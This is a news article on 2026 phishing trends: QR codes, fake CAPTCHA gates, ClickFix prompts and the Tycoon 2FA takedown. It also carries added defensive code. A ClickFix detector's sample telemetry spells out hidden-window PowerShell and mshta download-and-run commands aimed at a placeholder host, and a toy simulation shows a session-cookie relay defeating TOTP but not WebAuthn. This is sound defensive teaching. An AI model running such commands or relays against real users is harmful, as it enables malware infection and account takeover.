Credential thieves exploit trust checkpoints — Arabian Post

Attackers are shifting credential theft campaigns towards QR codes, fake CAPTCHA pages and ClickFix-style prompts, turning familiar security checks into tools for large-scale account compromise.

Fresh threat telemetry for the first quarter of 2026 shows email-based phishing remains vast in scale, with about 8.3 billion threats detected between January and March. Although monthly volumes eased from 2.9 billion in January to 2.6 billion in March, the composition of attacks changed sharply. Link-based threats accounted for 78% of email attacks, underlining a move away from traditional malware attachments towards hosted phishing pages designed to harvest logins, session cookies and authentication tokens.

The fastest-growing technique involved QR codes, which rose from 7.6 million attacks in January to 18.7 million in March, a 146% increase over the quarter. Attackers embedded malicious QR codes inside PDFs, office documents and email bodies to push victims towards phishing sites, often on personal mobile devices that sit outside corporate monitoring systems. PDF attachments remained the dominant delivery channel for QR-based campaigns, rising to about 70% of such attacks by March, while QR codes placed directly inside email messages surged by 336% during the month.

Fake CAPTCHA gates have become a parallel growth area. CAPTCHA-gated phishing more than doubled in March to 11.9 million attacks, the highest monthly level recorded over the past year. These pages exploit a familiar user habit: completing a visual verification step before reaching content. Behind the apparent security check, victims are redirected to counterfeit login pages or manipulated into carrying out harmful actions.

ClickFix tactics extend that deception further. Instead of merely asking users to click a link, attackers display fake verification instructions (a broken page, a "prove you are human" step) that tell victims to copy a command to the clipboard and paste it into the Windows Run dialog, a terminal or PowerShell on their own systems. The technique has been used to trigger PowerShell execution, download information-stealing malware, or redirect users into credential-harvesting flows. Because the email or page carries no attachment or executable, only text, it slips past scanners that look for payloads. Its success depends less on exploiting software flaws than on persuading users that they are completing a routine browser or access check.
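The user-executed command is the one artifact a ClickFix chain cannot hide: a script host spawned from an interactive parent (Explorer, a browser) with a download-and-run one-liner. The following is an added detection example written for this page, not code from the article or any vendor; the process-creation events are constructed to resemble Sysmon Event ID 1 records, and the field names (`parent`, `image`, `cmdline`), the example hostname `example.invalid` and the scoring threshold are assumptions.

```python
"""Flag ClickFix-style command execution in process-creation telemetry.

Added example: events below are constructed; field names are assumptions.
"""
import base64
import re
from dataclasses import dataclass

# ClickFix chains start from whatever the victim was told to open: the Run box
# (explorer.exe parent), a terminal, or the browser itself, then fetch and run.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}

ENCODED_RE = re.compile(r"(?i)-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]{20,})")

SUSPICIOUS = [
    (r"(?i)\b(iwr|invoke-webrequest|invoke-restmethod|curl|wget)\b.*\|\s*(iex|invoke-expression)\b",
     "download-and-execute pipe"),
    (ENCODED_RE.pattern, "encoded command"),
    (r"(?i)-w(indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)\bmshta(\.exe)?\s+https?://", "mshta remote HTA"),
    (r"(?i)-e(p|x|xecutionpolicy)\s+(bypass|unrestricted)", "execution policy bypass"),
    # Kits often append a fake verification string so the pasted text looks legitimate.
    (r"(?i)not a robot|verification id|captcha", "fake verification text in command line"),
]


@dataclass
class ProcessEvent:
    parent: str
    image: str
    cmdline: str


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score(event: ProcessEvent) -> list:
    """Return the reasons an event looks like ClickFix execution (empty if none)."""
    reasons = []
    if event.image.lower() not in SCRIPT_HOSTS:
        return reasons
    # Match against the decoded payload as well, so encoding does not hide the verbs.
    text = event.cmdline + " " + decode_encoded_command(event.cmdline)
    if event.parent.lower() in INTERACTIVE_PARENTS:
        reasons.append(f"script host spawned by {event.parent}")
    for pattern, label in SUSPICIOUS:
        if re.search(pattern, text):
            reasons.append(label)
    return reasons


def is_clickfix(event: ProcessEvent) -> bool:
    """One weak signal (e.g. Explorer launching cmd.exe) is normal; two or more is not."""
    return len(score(event)) >= 2


def detect(events: list) -> list:
    """Indices of events that should raise an alert."""
    return [i for i, e in enumerate(events) if is_clickfix(e)]


# Constructed sample telemetry (not real logs).
_ENC = base64.b64encode("mshta https://example.invalid/x.hta".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "powershell.exe",
                 'powershell -w hidden -c "iwr https://example.invalid/v.txt | iex" '
                 '# "I am not a robot - reCAPTCHA Verification ID: 1234"'),
    ProcessEvent("explorer.exe", "powershell.exe", f"powershell -ep bypass -enc {_ENC}"),
    ProcessEvent("services.exe", "powershell.exe",
                 r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
    ProcessEvent("explorer.exe", "cmd.exe", "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for i in detect(SAMPLE_EVENTS):
        print(i, score(SAMPLE_EVENTS[i]))
```

The same signals map onto EDR or SIEM queries; the Run-box variant also leaves the pasted text in the user's `HKCU\...\Explorer\RunMRU` key, which is worth collecting alongside the process event.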

The rise of these methods comes despite disruption against major phishing-as-a-service platforms. Tycoon 2FA, one of the most prominent kits used to bypass multifactor authentication, suffered a coordinated takedown in March that targeted 330 domains linked to phishing portals, control panels and related infrastructure. The operation reduced Tycoon-linked email activity by about 15% over the rest of the month and limited access to active phishing pages.

Yet the broader ecosystem has proved resilient. Tycoon 2FA first appeared in 2023 and became a leading adversary-in-the-middle platform, enabling attackers to impersonate services such as Microsoft 365, Outlook, OneDrive, SharePoint, Gmail and other cloud applications. By relaying the authentication exchange to the real service in real time, the kit could capture credentials and the session cookie the service issued, allowing attackers to access accounts even when victims used multifactor authentication that is not phishing-resistant, such as one-time codes or push approvals. Only credentials bound to the site's origin, such as FIDO2/WebAuthn passkeys and security keys, defeat a relay of this kind.
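To make the relay mechanism concrete, here is an added simulation written for this page; it is not code from the article, from Tycoon 2FA or from any kit. A toy identity provider issues a bearer session cookie after password plus a TOTP-style code, or after an origin-bound WebAuthn-style assertion; a relay on a look-alike domain forwards each step in real time. The origins `login.example.com` and `login.example-com.net`, the user record layout and the use of an HMAC "device key" in place of the authenticator's asymmetric signature are assumptions made for the example; the origin and rpId checks are the point.

```python
"""Adversary-in-the-middle relay against TOTP versus origin-bound WebAuthn (added example)."""
import hashlib
import hmac
import json
import secrets
import time

LEGIT_ORIGIN = "https://login.example.com"      # assumed legitimate IdP origin
PHISH_ORIGIN = "https://login.example-com.net"  # assumed attacker look-alike origin
RP_ID = "example.com"                           # assumed relying-party id


def totp(secret: bytes, step: int) -> str:
    """Toy time-based code: 6 digits from an HMAC over the 30-second step counter."""
    digest = hmac.new(secret, step.to_bytes(8, "big"), hashlib.sha1).digest()
    return f"{int.from_bytes(digest[:4], 'big') % 1_000_000:06d}"


class IdentityProvider:
    """Minimal IdP that hands out a bearer session cookie after either MFA method."""

    def __init__(self):
        self.users, self.sessions, self.challenges = {}, {}, set()

    def register(self, user, password, totp_secret, device_key):
        self.users[user] = {"pw": hashlib.sha256(password.encode()).hexdigest(),
                            "totp": totp_secret,
                            "device_key": device_key}  # stands in for a registered public key

    def _issue(self, user):
        cookie = secrets.token_hex(16)
        self.sessions[cookie] = user
        return cookie

    def login_totp(self, user, password, code):
        rec, step = self.users.get(user), int(time.time()) // 30
        if rec and rec["pw"] == hashlib.sha256(password.encode()).hexdigest() \
                and code in (totp(rec["totp"], step), totp(rec["totp"], step - 1)):
            return self._issue(user)
        return None

    def challenge(self):
        c = secrets.token_hex(16)
        self.challenges.add(c)
        return c

    def login_webauthn(self, user, client_data: bytes, signature: bytes):
        """Accept only assertions whose signed client data names OUR origin."""
        rec, cd = self.users.get(user), json.loads(client_data)
        if not rec or cd.get("origin") != LEGIT_ORIGIN or cd.get("challenge") not in self.challenges:
            return None
        self.challenges.discard(cd["challenge"])
        signed = hashlib.sha256(RP_ID.encode()).digest() + hashlib.sha256(client_data).digest()
        expected = hmac.new(rec["device_key"], signed, hashlib.sha256).digest()
        return self._issue(user) if hmac.compare_digest(expected, signature) else None

    def whoami(self, cookie):
        return self.sessions.get(cookie)


class Authenticator:
    """Victim's key: it signs the origin the browser reports, whatever the page claims.
    (A real browser would refuse outright, since example-com.net is outside RP_ID's scope.)"""

    def __init__(self, device_key):
        self.device_key = device_key

    def sign(self, browser_origin, challenge):
        client_data = json.dumps({"type": "webauthn.get", "challenge": challenge,
                                  "origin": browser_origin}).encode()
        signed = hashlib.sha256(RP_ID.encode()).digest() + hashlib.sha256(client_data).digest()
        return client_data, hmac.new(self.device_key, signed, hashlib.sha256).digest()


class Relay:
    """Attacker's reverse proxy on PHISH_ORIGIN: forwards each step to the real IdP and keeps
    a copy of any session cookie that comes back. The victim is logged in and sees nothing."""

    def __init__(self, idp):
        self.idp, self.captured = idp, []

    def relay_totp(self, user, password, code):
        cookie = self.idp.login_totp(user, password, code)  # forwarded inside the code's window
        if cookie:
            self.captured.append(cookie)
        return cookie

    def relay_webauthn(self, user, authenticator):
        challenge = self.idp.challenge()                                  # real challenge
        client_data, sig = authenticator.sign(PHISH_ORIGIN, challenge)  # browser is on phish page
        cookie = self.idp.login_webauthn(user, client_data, sig)
        if cookie:
            self.captured.append(cookie)
        return cookie


def run_demo() -> dict:
    idp = IdentityProvider()
    totp_secret, device_key = secrets.token_bytes(20), secrets.token_bytes(32)
    idp.register("alice", "correct horse", totp_secret, device_key)
    relay, auth = Relay(idp), Authenticator(device_key)
    code = totp(totp_secret, int(time.time()) // 30)  # victim types password + current code
    stolen = relay.relay_totp("alice", "correct horse", code)
    phished = relay.relay_webauthn("alice", auth)     # same relay, origin-bound credential
    cd, sig = auth.sign(LEGIT_ORIGIN, idp.challenge())
    return {"totp_relay_succeeded": idp.whoami(stolen) == "alice",
            "webauthn_relay_succeeded": phished is not None,
            "webauthn_direct_succeeded": idp.login_webauthn("alice", cd, sig) is not None,
            "captured_cookies": len(relay.captured)}


if __name__ == "__main__":
    print(run_demo())
```

The relayed TOTP login yields a cookie the attacker can replay from anywhere; the relayed WebAuthn assertion is rejected because the signed client data carries the phishing origin, not the IdP's. Session cookies remain bearer tokens, so token-protection or conditional-access controls are still needed for sessions established before a move to phishing-resistant MFA.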

By mid-2025, Tycoon 2FA was linked to about 62% of blocked phishing attempts in some enterprise telemetry and generated more than 30 million malicious emails in a single month. It is estimated to have affected around 96,000 victims worldwide, including more than 55,000 Microsoft customers. Healthcare, education and public-sector organisations were among the most exposed because compromised accounts in those environments can open access to sensitive records, payment systems, procurement channels and internal collaboration tools.

The takedown has not removed the threat model. Attack code, templates, hosting patterns and customer bases have migrated across competing kits and affiliate networks. Other platforms, including Mamba 2FA, EvilProxy, Sneaky 2FA and Whisper 2FA, have attempted to absorb demand left by Tycoon’s disruption. This has fragmented the market rather than ending it, making detection based on a single brand or infrastructure pattern less reliable.

Credential phishing now functions as an industrial service economy. Attackers can rent phishing kits, buy hosting, use bulk email tools, purchase stolen credentials, and monetise access through business email compromise, invoice fraud, data theft or ransomware deployment. CAPTCHA gates, QR codes and ClickFix prompts fit neatly into this model because they increase user interaction while reducing the effectiveness of automated scanning: a CAPTCHA gate stops URL crawlers and sandboxes from ever reaching the credential page, a QR code moves the link into an image that text-based link scanners do not follow, and a ClickFix prompt puts no link or attachment in the message at all.

Business email compromise remains a major downstream risk. About 10.7 million such attacks were recorded in the first quarter, many involving generic outreach, fake invoices, payment redirection and impersonation of trusted staff or suppliers. Once a valid account is compromised, attackers can exploit existing conversations, internal contact lists and legitimate cloud sessions, making fraud attempts harder to distinguish from normal business activity.
